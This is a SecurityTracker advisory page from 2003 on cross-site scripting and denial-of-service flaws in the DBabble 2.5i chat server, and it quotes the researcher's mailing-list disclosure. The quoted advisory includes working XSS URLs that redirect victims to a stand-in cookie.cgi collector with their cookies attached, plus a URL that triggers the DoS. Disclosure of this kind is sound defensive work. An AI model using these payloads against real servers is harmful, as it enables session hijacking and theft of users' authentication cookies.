Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
|
|
|
|
|
|
|
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
|
|
|
|
Become a Partner and License Our Database or Notification Service
|
|
|
|
|
|
|
|
|
|
|
|
|
|
DBabble Chat Server Input Validation Flaws Permit Remote Cross-Site Scripting Attacks
|
|
SecurityTracker Alert ID: 1007700
|
|
CVE Reference: GENERIC-MAP-NOMATCH
(Links to External Site)
|
Date: Sep 14 2003
|
Impact: Disclosure of authentication information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information
|
Exploit Included: Yes
|
Version(s): 2.5i
|
Description: Some input validation vulnerabilities were reported in the DBabble chat server. A remote user can conduct cross-site scripting attacks.
Dr_insane reported that the software does not filter HTML code from user-supplied input before displaying the input. As a result,
a remote user can create a specially crafted URL that, when loaded by a target user, will cause arbitrary scripting code to be executed
by the target user's browser. The code will originate from the site running the DBabble software and will run in the security context
of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any,
associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site
acting as the target user.
Some demonstration exploit URLs are provided:
http://[HOST]:8132/dbabble?cmd=[XSS ATTACK]
http://[HOST]:8132/dbabble?[XSS
ATTACK]
http://[HOST]:8132/dbabble?cmd=cmd_newuser&lang=English&template=Standard (Fields name,password and Display name are vulnerable
to XSS ATTACK)
It is also reported that the software does not properly validate the 'display' variable values, which may cause
denial of service conditions. The nature of the denial of service conditions was not disclosed. A demonstration exploit URL was
provided:
http:[HOST]/dbabble?tok=1_1_840327879_1094951187&cmd=u_friends_del&hid=1&uid=3&display=WHATEVER!!!!
The vendor has
reportedly been notified.
|
Impact: A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the
DBabble server software, access data recently submitted by the target user via web form to the site, or take actions on the site
acting as the target user.
|
Solution: No solution was available at the time of this entry.
|
Vendor URL: www.netwinsite.com/dbabble/index.htm (Links to External Site)
|
Cause: Input validation error
|
Underlying OS: Linux (Any), UNIX (AIX), UNIX (FreeBSD), UNIX (OS X), UNIX (Solaris - SunOS), Windows (Any)
|
Reported By: dr_insane@pathfinder.gr
|
Message History:
None.
|
Source Message Contents
|
Date: Sun, 14 Sep 2003 05:03:00 +0300
From: "=?windows-1253?B?w+nc7e3n8iDQ7+z+7efy?=" <dr_insane@pathfinder.gr>
Subject: [0day] DBabble 2.5i- Instant Messaging for the office XSS/Cookie
|
*first published on: http://members.lycos.co.uk/r34ct/
-----------------------------------------------------------------------------
----------------
DBabble 2.5i- Instant Messaging for the office XSS/Cookie problems Advisory
-----------------------------------------------------------------------------
-----------------------------------------
DBabble 2.5i XSS/Cookie Problem
12/09/2003
-by dr_insane (dr_insane@pathfinder.gr)
-http://members.lycos.co.uk/r34ct/
-------------------
Vendor Information:
-------------------
Homepage: http://www.netwinsite.com/
Vendor informed
Vender Response : None (yet?)
-------------------
Affected Versions/systems:
-------------------
(Version 2.5i is vulnerable. Older versions may be vulnerable too)
Dbabble Solaris (Sparc)
Dbabble Linux libc6/redhat 5/6
Dbabble Free BSD
Dbabble MacOS X
Dbabble Freebsd
Dbabble AIX
Dbabble Windows NT/2000/XP/95/98/ME
NO VULNERABLE VERSIONS
- ?
-------------------
Description:
-------------------
DBabble is a chat, discussion, and instant messaging server and client, which allows
users to send encrypted instant messages, have private conversations, and create and
participate in private or public chat rooms and discussions. Users communicate with the
chat server using either a web browser, or a client for Windows 95/98/ME/NT/2000/XP.
Users can communicate with ICQ, MSN, Yahoo, and AIM (AOL) users, send instant messages to
groups of users, receive email copies of their instant messages or new discussion group
articles, and they can send and receive instant messaging from email addresses and mobile
phones. Discussion groups/forums can optionally be linked to external usenet (NNTP)
groups and/or made available to NNTP clients. A single DBabble chat server can support
thousands of simultaneous online users and can optionally be isolated from outside
communication.
I encountered XSS security holes in some scripts of Dbabble 2.5i and some other problems.
-----------------------------
Vulnerable Scripts/Exploit:
--------------------------------------------
(1)
http://[HOST]:8132/dbabble?cmd=[XSS ATTACK]
http://[HOST]:8132/dbabble?[XSS ATTACK]
http://[HOST]:8132/dbabble?cmd=cmd_newuser&lang=English&template=Standard (Fields
name,password and Display name are vulnerable to XSS ATTACK)
Another problem is that Dbabble uses cookies. So it is possible for someone to steal them
using XSS
attacks and some javascript.
Examples:
http://[HOST]/dbabble?cmd="><script>document.location='
http://www.yourhost.org/cgi-bin/cookie.cgi?
'%20+document.cookie</script>
http://[HOST]/dbabble?cmd=<script>document.location='
http://www.yourhost.org/cgi-bin/cookie.cgi?'
+document.cookie</script>
http://[HOST]/dbabble?cmd=><script>document.location='
http://www.yourhost.org/cgi-bin/cookie.cgi?'
+document.cookie</script>
These are the examples of "evil" Javascript . These Javascript examples gather
the users cookie and then send a request to the yourhost.org website with the cookie in the
query .
When you access a hostile link with a xss attack in those scripts youur
browser will execute the script commands.
This can be use for steal cookies , authentication tokens and other
private information.
If your browser is vulnerable to other holes ( like MSIE ;-) you can
have more problems...
(2)
Another problem is that the parametre 'display' doesn't check the values it can accept. This
can
lead to DOS attacks and other problems.
http:[HOST]
/dbabble?tok=1_1_840327879_1094951187&cmd=u_friends_del&hid=1&uid=3&display=W
HATEVER!!!!
-----------------
| SoLuTiOnS |
-----------------
Update to the next Version:>
-----------
| CONTACT |
-----------
Dr_insane
dr_insane@pathfinder.gr
http://members.lycos.co.uk/r34ct/
Greece
______________________________________________________________________________________
http://mobile.pathfinder.gr - Pathfinder Mobile logos & Ringtones!
http://www.pathfinder.gr - Δωρεάν mail από τον Pathfinder!
_______________________________________________
0day mailing list
0day@nothackers.org
http://nothackers.org/mailman/listinfo/0day
|
|
Go to the Top of This SecurityTracker Archive Page
|
